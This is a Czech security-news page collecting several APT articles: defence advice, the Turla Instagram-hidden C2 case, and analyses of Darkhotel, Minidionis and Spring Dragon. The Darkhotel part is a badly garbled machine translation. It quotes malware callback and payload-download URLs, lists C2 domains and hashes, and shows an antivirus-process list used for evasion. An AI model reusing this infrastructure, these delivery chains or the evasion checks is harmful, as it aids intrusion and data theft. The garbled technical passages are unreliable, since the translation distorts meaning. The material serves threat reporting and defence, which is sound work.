- APT -

H  Aktualizace  Analýzy  Android  Apple  APT  Bezpečnost  BigBrother  BotNet  Cloud  Exploit  Hacking  Hardware  ICS  Incidenty  IoT  IT  Kongresy  Kriminalita  Kryptografie  Kyber  Mobilní  OS  Ostatní  Phishing  Podvod  Ransomware  Rizika  Rootkit  Sociální sítě  Software  Spam  Těžařské viry  Útoky  Viry  Zabezpečení  Zranitelnosti

Úvod  Seznam  Kategorie  Podkategorie 0  1  2  3  4  5 

Nedejte šanci, aby vás obrali hackeři

17.10.2017 SecurityWorld APT
S útoky typu APT (Advanced Persistent Threat, pokročilá perzistentní hrozba) se firmy mohou setkat stále častěji – a roste také jejich závažnost. Stejně tak ale stoupají i náklady spojené s ochranou před touto hrozbou. Je vaše organizace připravená na boj proti útokům APT? Měla by.

Útoky APT odpovídají svému názvu – je to typ síťového útoku, při kterém útočník vybere konkrétní cíl, používá sociální inženýrství a pokročilé technologie k průniku do sítě a poté se zaměřuje na vybraný cíl po dobu týdnů, měsíců nebo let až do okamžiku, kdy se mu podaří dosáhnout plánovaného výsledku nebo kdy dojde ke zmaření útoku.

Jakmile se dostane do sítě, je cílem útočníka zůstat neodhalený, zatímco přitom používá některé typy malwaru k zachytávání důvěrných informací, jež nakonec odesílá do jiné lokality k analýze a následnému prodeji na černém trhu.

Útoky APT jsou vysoce organizované, někdy se jich účastní celý tým útočníků a mívají dostatek finančních a technologických zdrojů.

Přestože APT mohou používat běžné hackerské nástroje, častěji využívají sofistikovaný, na zakázku vytvořený software, u kterého je nižší pravděpodobnost odhalení systémem ochrany zabezpečení. Typy útoků APT a jejich mechanismy zahrnují útoky nultého dne, phishing, pokročilý malware a rovněž celou řadu forem zneužití webů.

Tento příspěvek se zaměřuje na pět způsobů ochrany majetku organizace před útoky APT. Důležité jsou přitom úplně všechny.

1. Implementace hloubkové obrany

Bezpečnostní experti zdůrazňují potřebu zabezpečení, které využívá vrstvy (neboli hloubkovou obranu) jako součást běžné strategie zabezpečení sítí. Hloubková obrana je také jedním z nejlepších způsobů, jak zastavit útok APT ještě předtím, než infiltruje síť.

Znamená to kontrolovat vstupy a výstupy sítě, používat firewally nové generace, nasadit systémy detekce a prevence vniknutí (IDS/IPS), systémy SIEM (správa informací a událostí zabezpečení), implementovat systém správy zranitelností, využívat silnou autentizaci a správu identit, udržovat aktuálnost oprav zabezpečení a používat ochranu koncových bodů.

Protože je malware často zdrojem útoků APT, potřebujete také vysoce spolehlivé řešení pro omezování rizika malwaru. Vzhledem k tomu, že útoky APT mohou využívat špičkové technologie, musí být vaše bezpečnostní vybavení také na špičce. Znamená to volit pokročilá řešení pro detekci na základě chování, kdykoli je to možné.

Vaším cílem je zvýšení obtížnosti počátečního průniku do sítě, ale i pokud by došlo k překonání této vrstvy, musí každá další vrstva zabezpečení představovat další významnou překážku, která zastaví šíření útoku nebo ho dostatečně zpomalí, aby ho bylo možné zjistit a eliminovat.

Protože útočníci neustále aktualizují své nástroje a hledají nové zranitelnosti (mezery v pancíři), musejí být vaše nástroje také aktuální.

Poznámka: V loňském roce tvořil obrat v segmentu řešení ochrany před útoky APT více než 1,9 miliardy dolarů. Společnost The Radicati Group v roce 2015 uvedla, že očekává do roku 2019 nárůst na více než 6,7 miliardy dolarů ročně.

Ne každé bezpečnostní řešení však musí udělat díru do rozpočtu. Například sada Emet (Enhanced Mitigation Experience Toolkit) od Microsoftu je bezplatným bezpečnostním nástrojem založeným na systému Windows, který doplňuje existující obranu zabezpečení a pomáhá detekovat a blokovat metody zneužívající zranitelnosti.

SecurityIQ je zase služba institutu InfoSec, která vám umožní zasílat personálu fiktivní phishingové e-maily k otestování povědomí o zabezpečení. Silné interní zásady zabezpečení a pravidelné hodnocení rizik a zabezpečení jsou také nezbytné. Umožňují zaměřit bezpečnostní kontrolu tam, kde na tom nejvíce záleží.

2. Využití metod sledování a detekce

Důkladné sledování bezpečnostních kontrol vám pomůže rozpoznat první varovné známky útoku APT, které se často objevují v podobě anomálií v protokolech, přenosech a ve formě dalších aktivit neodpovídajících profilům.

Je kriticky důležité sledovat veškeré příchozí a odchozí síťové přenosy, interní přenosy a všechna zařízení, která přistupují k vaší síti.

Nepřetržitý monitoring vám nejen pomůže odhalit podezřelou aktivitu co nejdříve, ale také omezuje možnosti eskalace oprávnění a dlouhodobé průniky. Výstupy z monitoringu mohou navíc sloužit jako forenzní důkazy, pokud se útok dostane až do takového bodu.

3. Využívání služby threat intelligence

Několik dodavatelů zabezpečení nabízí služby threat intelligence, v rámci kterých se z několika zdrojů sbírají surová data o nově vznikajících hrozbách a poté dochází k jejich analýze a filtrování za účelem vytvoření užitečných a k akci použitelných informací.

Tyto informace jsou často ve formě datových kanálů pro systémy řízení zabezpečení a také reportů pro manažery IT a ředitele, aby jim pomohly pochopit hrozby existující v jejich oboru.

Pro threat intelligence je klíčová souvislost globálních zpráv s hrozbami pro vlastní síť organizace. Bezpečnostní personál tak může v reálném čase rychle identifikovat a vyřešit hrozby s vysokým rizikem.

Útoky APT se mohou šířit různými metodami a mohou se zaměřovat na zranitelnosti, které ještě nejsou bezpečnostním společnostem známé, takže je nezbytné rozpoznávat příznaky útoku APT, co nejdříve to je možné.

Threat intelligence například často poskytne chybějící článek, který propojí anomálie zaznamenané v protokolu (log) sítě se zranitelností nultého dne.

4. Školení pro zvyšování povědomí o zabezpečení

Existuje dobrý důvod, proč se téměř v každé diskuzi o bezpečnosti IT zmiňuje nutnost školení pro zvyšování povědomí o zabezpečení.

Když zaměstnanci skutečně rozumějí tomu, jak je nebezpečné klikat na ošemetné odkazy v e-mailech, a dokážou rozpoznat metody sociálního inženýrství, stanou se z nich partneři v boji proti bezpečnostním hrozbám a nakonec to pomáhá chránit sítě a v nich uložená data.

Školení tohoto druhu musejí zahrnovat rychlý přehled bezpečnostních zásad organizace a také následků pro všechny zaměstnance, pokud by došlo k bezpečnostnímu incidentu v důsledku jejich činnosti.

V závislosti na okolnostech to může znamenat další školení, kritiku na personálním oddělení, nebo dokonce okamžité propuštění. Mějte však na paměti, že zaměstnanec obvykle chce dělat svou práci dobře a nechce být příčinou firemních ztrát plynoucích z útoku.

Nejlepším přístupem tedy je zdůrazňování pozitivních aspektů během školení pro zvyšování povědomí a různé formy motivace pro zvyšování znalostí o zabezpečení.

5. Plán reakce na incidenty

Dokonce i s největším úsilím a s využíváním drahých technologií se může stát, že v určitý okamžik dojde k narušení zabezpečení firmy: většina expertů se shoduje, že otázkou není „jestli“, ale „kdy“.

Použití solidního plánu reakcí na incidenty dokáže eliminovat útok, minimalizovat škody a zastavit další úniky dat – výsledkem je minimalizace následných škod na pověsti a značce.

Kromě popisu odpovědnosti jednotlivých pracovních rolí za konkrétní akce od identifikace po řešení by měl váš plán reakcí na incidenty obsahovat kroky k ochraně forenzních důkazů o narušení. Vaše organizace může tyto důkazy potřebovat k usvědčení útočníků, pokud dojde k jejich dopadení, což bohužel není příliš pravděpodobné.

Forenzní důkazy také pomohou vašemu týmu zabezpečení najít bezpečnostní díry, zesílit kontrolu a zabránit opakování v budoucnu. Jedním z dobrých nápadů také je seznámit se s frameworkem Cyber Kill Chain společnosti Lockheed Martin, který pracuje s modelem útoku a řeší každou posloupnost bezpečnostní události.

Znalost způsobů, jak útočník identifikuje cíl a prochází fázemi útoku, může pomoci personálu zabezpečení rozpoznat útok v rané fázi procesu.

Terčem útoků APT může být každá organizace bez ohledu na její velikost. Pochopení toho, jak útok APT funguje, vybudování nejlepší možné obrany v rámci vašich možností a vzdělávání vašeho personálu, tak aby dokázal rozpoznat vše podezřelé, může omezit škody a v některých případech i v první linii zabránit útoku.

Hackeři našli netradiční způsob maskování. Adresu svého serveru ukryli na Instagram Britney Spears
8.6.2017 Živě.cz APT
Ruská hackerská skupina se zaměřuje na významné osobnosti
Backdoor byl instalován jako doplněk do prohlížeče Firefox
Adresa serveru byla uložena jako komentář na Instagramu
Bezpečnostní odborníci Esetu objevili trojského koně, jenž se maskuje za doplněk do prohlížeče Firefox a má a za úkol útočníkům odesílat informace o aktivitě oběti. Podle zprávy, kterou vydali a svém blogu, jde o dílo ruské hackerské skupiny Turla, která se často zaměřuje na státní představitele nebo celebrity. Nejzajímavějším na tomto případě je způsob, jakým hackeři maskují adresu řídícího serveru, s nímž malware komunikuje.

Backdoor v doplňku

Útočníci využili napadaný web jedné ze švýcarských bezpečnostních společností, takže pokud ji navštívil uživatel s prohlížečem Firefox, bylo mu nabídnuto stažení doplňku s názvem HTML5 Encoding. Pro méně znalého uživatele se může addon jevit jako součást, která pomůže ke korektnímu zobrazení stránky. Ve skutečnosti však začne po instalaci prohlížeč odesílat uživatelská data na server útočníků. Ostatně vše je postaveno na javascriptovém backdooru, který se objevil před necelým rokem v podobě infikovaného dokumentu pro Word a rovněž instaloval totožný doplněk do Firefoxu.

Wikileaks zveřejnil detaily další kyberzbraně CIA. Jmenuje se Pandemic a mohla na přání zasáhnout celé podniky
Zajímavostí je, že skupina Turla použila tento nástroj v roce 2016 pro napadení rumunských institucí.

V hlavní roli Britney Spears

Backdoor v doplňku pro webový prohlížeč by nebyl nijak zajímavý a takto distribuovaný malware je běžným postupem útočníků. V tomto případě si ale zaslouží pozornost díky způsobu, jakým je zajištěno zamaskování adresy řídícího serveru, z něhož putují pokyny pro instalované instance malwaru a zároveň jsou na něj odesílány získaná uživatelská data.

Šíří se podvodná kampaň lákající na slevy v supermarketech. Neklikejte na ni
Útočníci adresu v prvním kroku ukryli pomocí nejrozšířenějšího zkracovače adres Bit.ly, který vždy vygeneruje adresu ve formátu bit.ly/xxxxxxx. A právě unikátních sedm znaků, které jsou součástí každé URL, ukryli útočníci do komentáře na sociální síti Instagram.

Konkrétně v tomto případě to byla fotka Britney Spears, kterou okomentoval uživatel s nickem asmith2155. Na první pohled není komentář ničím zajímavý a nikoho nemůže napadnout, že má nějaký další účel.

Komentář skrývá vše potřebné pro získání adresy serveru (zdroj: Eset)

Pokud byste ale text komentáře zkopírovali a vložili do textového editoru, zjistíte, že před některými písmeny a číslicemi se nachází Unicode znak \200d. Ten se používá primárně při práci v emoji a při standardním zobrazení není viditelný. V tomhle případě ale označuje právě znaky tvořící onu zkrácenou adresu na bit.ly:

smith2155< 200d >#2hot ma< 200d >ke lovei< 200d >d to < 200d >her, < 200d >uupss < 200d >#Hot < 200d >#X

Pokud tedy poskládáte vše, co je za zástupným \200d, dostanete adresu bit.ly/2kdhuHX. Pod tou se ukrývala standardní adresa serveru a skriptu, který se o komunikaci staral.

Pokud útočníci budou chtít změnit server, mohou komentář na sociální síti smazat a nahradit jej jiným, který povede na aktualizovaný zkrácený odkaz s adresou nového serveru.

Útoky Darkhotel v roce 2015

12.8.2015 APT

Darkhotel APT útoky datem 2014 a starší jsou charakterizované zneužití odcizených certifikátů, nasazení HTA souborů s více technik a použití neobvyklých metod, jako je infiltrace hotelového Wi-Fi připojení na internet umístit zadní vrátka v systémech terčů. V roce 2015, mnoho z těchto technik a činností zůstanou v použití. Nicméně, kromě nových variant škodlivého HTA, najdeme nové oběti, .rar příloh s RTLO spearphishing a nasazení 0 den od Hacking Team.

Darkhotel APT pokračuje spearphish cíle po celém světě, s širším geografickém dosah, než jeho předchozí botnet buildout a hotelové Wi-Fi útoků. Některé z těchto cílů jsou diplomatické nebo máte strategické obchodní zájmy.

Umístění cílů a obětí Darkhotel se v roce 2015:

Severní Korea
Rusko
Jižní Korea
Japonsko
Bangladéš
Thajsko
Indie
Mosambik
Německo
2015 Darkhotel HTA a backdoor související využívat související a C2 místa:

storyonboard [.] net
tisone360 [.] org
openofficev [.] info
saytargetworld [.] net
error-page [.] net
eonlineworld [.] net
enewsbank [.] net
thewordusrapid [.] cz
2015 spearphishing Incident název přílohy podmnožina:

harmonogram (6.1 ~ 6) .rar -?> plán (6,1 ~ 6) _ gpj.scr
harmonogram (2.11 ~ 16) .rar -?> plán (2.11 ~ 16) _ gpj.scr
congratulation.rar -?> congratulation_ gpj.scr
letter.rar -?> letter_ gpj.scr
Důsledné využívání popletl HTA stahují

Ať už se infekce je dosaženo prostřednictvím spearphishing, fyzický přístup k systému nebo 0den Hackerství týmu Flash, tam často se zdá být běžnou metodou pro nově infikované systému komunikovat s Darkhotel je C2:

Lehce zatemnil (double unikl sada JavaScript hodnoty proměnných) skript udržována v rámci HTA souboru zapíše spustitelný na disk a spustí jej.

Je zajímavé, že tento konkrétní skupina má už léta nasazených backdoor a downloader kód ve formě HTA souborů. V roce 2010 jsme pozorovali to re-purposing články o Severní Koreji americkým think-tanku Brookings Institute, s cílem zaútočit severokorejského související cíle se škodlivým kódem pohřben v HTA soubory . To také e-mailem odkazy na jeho škodlivých HTA soubory na severokorejských turistických skupin, ekonomové se zájmem v Severní Koreji, a další. Je to poněkud zvláštní vidět takovou těžkou závislost na starší technologii Windows-specifické, jako je HTML aplikací, zavedených společností Microsoft v roce 1999 .

Z nedávné sendspace.servermsys.com/downloader.hta:

Útoky Darkhotel v roce 2015

Po popravě a útěku několik proměnných, HTA používá starověké ADODB.Stream komponenty, aby vypsat řetězec ve spojení XOR s 0x3d jako spustitelný soubor a spustí jej.

Útoky Darkhotel v roce 2015

Tento kód vede v provedení "internet_explorer_Smart_recovery.exe" 054471f7e168e016c565412227acfe7f, a skryté okně prohlížeče telefonování zpět do C2. V tomto případě se zdá, že operátoři Darkhotel jsou kontroly jako na tom, zda oběti výchozí prohlížeč Internet Explorer, protože všechny verze IE vrátí hodnotu "0" a ostatní prohlížeče odejít "appMinorVersion" nedefinovaný. Tento sběr údajů se zdá poněkud zvláštní, protože HTA soubory jsou podporovány a provozují Mshta.exe na systémech Windows pouze, stále dodaných s operačním systémem Windows 8. Možná je to artefakt od začátku vývoje kódu. Zde je novější verze:

"Hxxp:? //sendspace.servermsys.com/readme.php Type = popravu & výsledek = created_and_executed & info =" + navigator.appMinorVersion + "

Útoky Darkhotel v roce 2015

Soubor "internet_explorer_Smart_recovery.exe" je jednoduchý popletl downloader. Série XOR 0x28 smyček dešifrovat obsah dávkového souboru self-vymazání, který je pak napsán na disk a popraven. Později v provedení, složitější rc4 smyčka dešifruje stažení adres URL a dalších řetězců a dovozu.

Útoky Darkhotel v roce 2015

Po dokončení, toto URL řetězec dešifrování a connectback vypadá
http://sendspace.servermsys.com/wnctprx. Soubor se stáhne (b1f56a54309147b07dda54623fecbb89) na "TMP" soubor v% temp%, popraven, a downloader východy. Tento větší soubor je backdoor / downloader, který obsahuje funkce ssh, a kapky své klíče na disk pro interakci ssh. Najdeme starší Darkhotel informace zloděje klesl a běží na systému těmito stahují.

Spearphishing a .rar Přílohy s RTLO

Darkhotel APT bude vytrvale spearphish konkrétní cíle, aby mohl úspěšně ohrozit systémy. Některé cíle jsou spearphished opakovaně s hodně stejný sociálně-inženýrské schémat. Například, příloha "plán (2.11 ~ 16) .rar" může být poslán 10.února, s Darkhotel vracet ke stejným cílům na konci května pro druhý pokus s upevňovací "plánu (6,1 ~ 6) .rar".

Útoky Darkhotel v roce 2015

Je důsledně archivuje RTLO SCR spustitelné soubory se v .rar archivu, aby se objeví na cíl jako neškodných JPG souborů. Tyto spustitelné soubory jsou lite kapátka, zachování těchto vějička souborů JPEG, a kód pro vytvoření LNK downloader.

Útoky Darkhotel v roce 2015

Když cílový pokusí otevřít, co si myslí, že je soubor jpg image, spustitelný kód běží a upustí jpg image na disk, a pak jej otevře s mspaint.exe v pozadí. Tato "gratulace" dokument je v korejštině, odhaluje pravděpodobnou charakteristiku zamýšleného cíle.

Útoky Darkhotel v roce 2015

Zatímco je zobrazen obraz, kód klesne neobvyklou mspaint.lnk zástupce na disk a spustí jej. Zástupce udržuje víceřádkové cílový skript. Tato technika je také používán jinými APT jako vytrvalost mechanismy, jak dokumentuje naši Mandiant kolegy . Soubor 64KB lnk je downloader kód:

Útoky Darkhotel v roce 2015

Když je spuštěn tento LNK souborů, začne s AJAX založený proces stahování pro "unzip.js" souboru (a07124b65a76ee7d721d746fd8047066) na openofficev.info. To je další soubor wscript provádění AJAX stáhnout a spustit poměrně velký kompilovaný spustitelný:

Útoky Darkhotel v roce 2015

Tento spustitelný kód je uložen do% temp% \ csrtsrm.exe a popraven tam. Je to poměrně velký spustitelný soubor (~ 1,2 MB), který vstřikuje škodlivý kód a založí vzdálených závity do legitimních procesů.

Ukradené certifikáty a únikům

Skupina se zdá udržovat zásoby ukradených certifikátů a nasazuje své stahovače a zadní vrátka podepsané s nimi. Některé z více nedávných odvolaných certifikátů patří ty, které patří k Xuchang Hongguang Technology Co. Ltd.

Darkhotel nyní má tendenci skrývat svůj kód za vrstev šifrování. Je pravděpodobné, že to pomalu přizpůsoben útočení lépe bránil prostředí a nechce pálit tyto ukradené digitální certifikáty. V předchozích útoků by to prostě využili dlouhého seznamu realizovaných slabě, rozbité certifikátů.

Nejen, že jsou jeho mlžení techniky stává silnější, ale jeho seznam technologie anti-detekce roste. Například tento podepsal Downloader (d896ebfc819741e0a97c651de1d15fec) dešifruje soubor anti-malware řetězce v etapách k identifikaci obranné technologie na nově infikovaným systémem, a pak otevře každý proces, hledal jméno odpovídající obrázek:

c: \ avast! sandbox \ WINDOWS \ system32 \ kernel32.dll - Avast!
Avp.exe - Kaspersky Lab
mcagent.exe; mcuicnt.exe - Intel / McAfee
bdagent.exe - BitDefender
ravmon.exe, ravmond.exe - Peking Rising
360tray.exe, 360sd. exe, 360rp.exe, exeMgr.exe - Qihoo 360
ayagent.aye, avguard,. avgntsd.exe - Avira Antivirus
ccsvchst.exe, nis.exe - Symantec Norton
avgui.exe, avgidsagent.exe, avastui.exe, avastsvc.exe ! - Avast
msseces.exe; msmpeng.exe - Microsoft Security Essentials a Microsoft Anti-Malware Service
AVK.exe; AVKTray.exe - G-Data
avas.exe - TrustPort AV
tptray.exe - Toshiba utility
fsma32.exe; fsorsp.exe - F-Secure
econser.exe; escanmon.exe - mikrosvět Technologies eScan
SrvLoad.exe; PSHost.exe - Panda Software
egui.exe; ekrn.exe - ESET Smart Security
pctsSvc.exe; pctsGui.exe - PC Tools Spyware Doctor
CASC. exe, UmxEngine.exe - CA Security Center
cmdagent.exe; cfp.exe - Comodo
KVSrvXP.exe; KVMonXP.exe - Jiangmin Antivirus
nsesvc.exe; CClaw.exe - Norman
V3Svc.exe - AhnLab
guardxup. - IKARUS
FProtTray. - F-Prot
op_mon - Agnitum Outpost
vba332ldr, dwengine.. - DrWeb

Dokonce i identifikační informace, které backdoor hledá od systému není dešifrovány do běhu. Stejně jako "informační a zloděj" složky popsanou v našem předchozím technické zprávě Darkhotel , tato složka se snaží ukrást sadu dat, s nimiž identifikovat infikovaný systém. Většina informací jsou shromažďovány se stejným souborem hovorů, tj kernel32.GetDefaultSystemLangID, kernel32.GetVersion, a kernel32.GetSystemInfo:

Výchozí systém codepage
Informace o Síťový adaptér
Architektura procesoru
Hostname a IP adresa
Windows OS a Service Pack verze
V podstatě, hodně z tohoto informací zloděj kód je stejný jako bylo pozorováno v předchozích útoků.

Tisone360.com, Návštěvy, a Hacking Team Flash 0 dnů

Tisone360.com místo bylo obzvláště zajímavé pro nás. V dubnu 2015 byl Darkhotel email-phishing s odkazy na dřívější (CVE-2014) Flash exploity, a pak, na začátku července, to začalo distribuovat to, co je údajně unikly Hacking Team Flash 0 dnů.

Vypadá to, že Darkhotel APT může byli s použitím unikly HackingTeam Flash 0 dnů, aby se zaměřují na specifické systémy. Můžeme se otočit z "tisone360.com" identifikovat některé z této činnosti. Místo bylo vzhůru a aktivní jako pozdní na 22 červenci 2015. Nicméně, to vypadá, že malá část její činnosti. Kromě icon.swf HT 0den (214709aa7c5e4e8b60759a175737bb2b), to vypadá, jako kdyby "tisone360.com" místo bylo dodávat Flash CVE-2014 - 0497 využívat v dubnu, jsme nahlásili související zranitelnost Adobe v lednu 2014, kdy ji byl používán Darkhotel APT.

V poslední době, Darkhotel APT udržuje více pracovních adresářů na této stránce.

Útoky Darkhotel v roce 2015

Je to adresář ims2, že je nejvíce aktivní. Obsahuje sadu zadní vrátka a využije. Nejzajímavější z nich je hlášena Hacking Team Flash 0 dnů, icon.swf. Ve dnech následujících po veřejné zmínka o tomto serveru, posádka se pomalu zpřísnila dolů otevřený přístup k / ims2 /. Ať tak či onak, obsah i nadále aktivně používat.

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
->% temp% \ RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

Po icon.jpg je stažen bleskem zneužít, je dekódovat pomocí multi-byte XOR klíče 0xb369195a02. Poté stáhne další komponenty.

Je zajímavé, že skupina se zdá být mění kompilace a linker časová razítka jeho spustitelného kódu daty v roce 2013. Vidíme to na více vzorků nasazených a pozorovaných poprvé v polovině-2015, včetně icon.jpg Downloader.

Útoky Darkhotel v roce 2015

Log návštěv adresáře webu zaznamenává, že adresář byl zřízen 8. července. Hrstka návštěv konkrétní adresu URL na serveru z pěti systémů založených na těchto místech byly zaznamenány na 8. a 9.. Některé z nich jsou pravděpodobně Darkhotel APT cíle:

Německo
Jižní Korea
Čína (pravděpodobně výzkum)
USA
Japonsko
Nicméně, jeden z těchto systémů zabušil místo na 9., hostující téměř 12.000 krát za 30 minut. Tento objem dopravy je pravděpodobné, že reprezentovat hlučnou pokus o skenování výzkumu a ne někoho, kdo DoS'ing stránky:

Útoky Darkhotel v roce 2015

Zaznamenané návštěvy na místě po 9. budou pravděpodobně nespolehlivé a mohou být více výzkumníků, reagovat na rostoucí proslulosti lokality v návaznosti na veřejné zprávy o 9.. Mnoho z těchto přibližně 50 návštěv pocházejí z podmnožiny uvedených systémů a jsou opakovány vícekrát. Návštěvy z následujících umístění došlo na nebo po 10.:

Německo (pravděpodobně výzkum)
Ukrajina (pravděpodobně výzkum)
Amazon Web Services, na více místech (pravděpodobně bude výzkum)
Googlebot, více míst
USA
Irsko (pravděpodobně výzkum)
Rusko
Brazílie
Čína
Finsko
Kanada
Tchaj-wan
Francie (pravděpodobně výzkum)
Česká republika
Konzistentní útok průtoku

Skupina Darkhotel má tendenci držet se toho, co funguje. Například pro léta viděli jsme opakovat využití spearphishing cíle přímo s HTA soubory. Nyní, jak se tisone360.com místa výše, jsme viděli opakovaném použití v roce 2015 z tvůrčího řetězce dodávky sad.

downloader -> hta Checkin -> info zloděj. -> více sestavené součástky
kapátkem -> WSH script -> WSH script -> info zloděj -> více sestavené součástky
spearphish -> kapátkem -> hta Checkin -> downloader -> info zloděj

Zatímco řetězec dodávky, která zahrnuje obfuscated skripty v rámci HTA soubory, nastal již v roce 2011 se zdá, že objem zvedl v roce 2014 a nyní 2015.

openofficev [.] info (2015)
office-revize [.] KOM (2014)
online.newssupply [.] net (2011)

Skrytí infrastruktura v očích

Skupina je nyní více ostražití při udržování svých stránek, zpřísnění konfiguraci a obsah odpovědi. Právě teď, jeho c2 reaguje s anti-hrdina obrazy "Drinky Crow" z alt Maakies karikatura:

Útoky Darkhotel v roce 2015

Ostatní Darkhotel C2S mají tendenci splynout s náhodnými stránek na webu, když jsou navštěvovány nesprávné nebo chybějící stránky. Jsou ripování obrázků buď z fotolia nebo články o řemeslné zmrzliny tvůrce zde:

Útoky Darkhotel v roce 2015

Technické detaily

HTA md5:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

Spearphish přílohy md5:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (Poprvé spatřen pozdní 2014, který se používá do 2015)
e85e0365b6f77cc2e9862f987b152a89 (nejprve viděný pozdní 2014, který se používá do 2015)

2015 velké downloader md5:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

Infostealers klesl v roce 2015

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

Subhosts a adresy URL:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2
www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js

Minidionis - ještě jeden APT s využitím cloud pohonů
25.7.2015 APT

Včera naši kolegové z Palo Alto Networks představila svůj Minidionis výzkumu (známý také pod jménem Kaspersky - "CloudLook"). Je to další backdoor ze APT skupiny odpovědné za jiné útoky, například CozyDuke , MiniDuke a CosmicDuke .

Analýza tohoto malwaru, všimli jsme si, že útočníci implementován schopnost mraku disk pro ukládání malware a stahovat je na infikovaných systémů. Téměř před rokem, jsme pozorovali další APT skupinu s názvem " CloudAtlas "pomocí cloud disky pro ukládání ukradené informace. Teď vidíme podobnou techniku ​​v CloudLook / Minidionis.

Minidionis používá multidropper schéma infikovat své oběti. Za prvé, aby se na tento útočník používá kopí phishing e-maily s samorozbalovacího archivu přílohu předstírající, že hlasové pošty. Když se oběť otevře archiv, druhá etapa kapátko provede a soubor WAV hraje vypadá jako skutečné hlasové schránky. Ve svém spearphish, CloudLook také používal samorozbalovací archiv obsahující soubor PDF láká je to obětem informace o světového terorismu: 

Po úspěšném provedení, Minidionis druhý stupeň kapátko používá ke stažení užitečné zatížení onedrive oblak skladování:

Malware mapuje Onecloud úložnou jednotku jako síťový disk pomocí hardcoded přihlašovací jméno a heslo a potom dolů kopií svých cloudových uložené zadní vrátka do místního systému:

Mohl by tento přístup se více hlavního proudu? Je docela dobře možné, protože to ve skutečnosti dává útočníkům jednoduchou metodu skrývá škodlivé chování. Zjištění nebezpečného provozu s legitimním cloudových služeb je složitější, protože to znamená, že blokuje legitimní služby.

Podle Kaspersky Security Network, každý útok pomocí Minidionis / CloudLook backdoor byl speciálně vytvořený pro konkrétní cíl. Tato specifičnost demonstruje, že útoky jsou velmi uživatelsky a zaměřil se na cenné cíle. Doposud jsme pozorovat několik cílů, nejvíce pozoruhodně evropských diplomatické organizací.

Kaspersky Lab detekuje všechny známé vzorky Minidionis / CloudLook jako Trojan.Win32.Generic, a úspěšně chrání své uživatele před hrozbou.

Jarní Dragon APT
20.6.2015

Pojďme prozkoumat několik zajímavých dodávek techniky z APT aktivní za posledních několik let, jaro Dragon APT. Papír dnes zveřejnila našimi kolegy v Palo Alto Networks představila část údajů o této posádky pod značkou " Lotus Blossom operace ", pravděpodobně pojmenovaný pro ladění řetězce přítomné v hodně z" Elise "codebase od nejméně 2012:" d: \ lstudio \ projekty \ lotus \ ... ".

Lotus Elise backdoor PNR

Schopnosti skupiny jsou více než hodně diskutovaných CVE-2012-0158 využije více než v posledních několika letech. Místo toho, skupina je známo, že zaměstnané půlden spearphish exploity, strategické webové kompromisy, a zalévání díry zaměstnávat aktualizace falešný Flash player re-směr. Skupina je spearphish sada nástrojů zahrnuje PDF exploity, Adobe Flash Player využije, a společné CVE-2012-0158 Word využívá včetně těch, které generuje z nechvalně známé stavebnice "Tran Duy Linh". Zatímco probíhající útoky Spring Dragon APT trvat nás zpět do zaměření na Vietnamu, ale zdá se, že válí stabilní mix exploitů proti obranných subdodavatelů po celém světě a vládní souvisejících organizací v VN, TW, PH, a na dalších místech přes Několik posledních let. Pojďme se rychle podívat na pár příkladů více svých možností narušení, které nebyly uvedeny jinde.

image01

Organizace se nachází v Myanmaru a cílené na jarním Dragon šly nevyslovený. Ale proniknutí techniky jarní Dračí tam nebyli jen 0158 spearphish, ale také napadené weby. V jednom případě, oni nahradili specializované montážní firmy písma potřebné k tomu, aby Myanma písmo. Můžete vidět obraz zde internetových stránek "Planet Myanmar", na konci roku 2012 distribuci takový balíček. Všechny zip odkazy byly přesměrovány do otráveným installer zip souboru. Jméno stahování bylo "Zawgyi_Keyboard_L.zip", a to upustil "setup.exe", který obsahoval několik backdoor komponent, včetně Elise "wincex.dll" (a42c966e26f3577534d03248551232f3, detekovaných jako Backdoor.Win32.Agent.delp). To majáky se s typickou Elise GET "GET /%x/page_%02d%02d%02d%02d.html", jak je uvedeno v dokumentu Lotus Blossom.

